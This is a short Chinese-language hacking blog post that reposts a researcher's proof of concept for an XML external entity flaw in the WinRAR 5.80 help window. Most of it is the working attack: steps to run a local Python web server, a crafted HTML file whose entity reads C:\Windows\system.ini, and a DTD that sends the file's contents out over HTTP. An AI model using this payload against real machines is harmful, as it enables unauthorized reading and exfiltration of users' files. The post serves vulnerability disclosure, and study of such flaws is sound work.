点击上方蓝字,关注HackerHub
走进精彩的黑客之旅。
参考来源 | hyp3rlinx
WinRAR,是Windows标配的压缩软件,大家都不陌生。
下面是一个XML 注入漏洞,出现在WinRAR的帮助模块。
漏洞作者:hyp3rlinx (趋势RCE漏洞也是他发现的)
厂商:win-rar & rarlab
版本:5.80
测试系统:Windows 10.0.18362.418 64bit
【POC】
此poc展示非授权情况下用户敏感文件上传
这里的文件是:C:\Windows\system.ini
1- 开一个简单的http服务器
在PYthon环境下运行 :
python -m SimpleHTTPServer 8800
并在当前目录放一个start.dtd文件,内容参考下文。
2-打开WinRAR
打开Winrar或者用Winrar打开任意一个rar文件
3- 点击菜单栏的帮助
4-点击 帮助主题
5-拖一个精心制作的html文件到上面的帮助窗口
请看视频:
winrar xml注入 poc
漏洞利用的html文件
<html><body><xml>
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml></body></html>
放置简单web服务器上的start.dtd文件
"1.0" encoding="UTF-8" xml version=
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>">
%all;
参考:
https://packetstormsecurity.com/files/154918/winrar580-xxe.txt
HackerHub发布 | 转载请注明出处
我在看,你呢?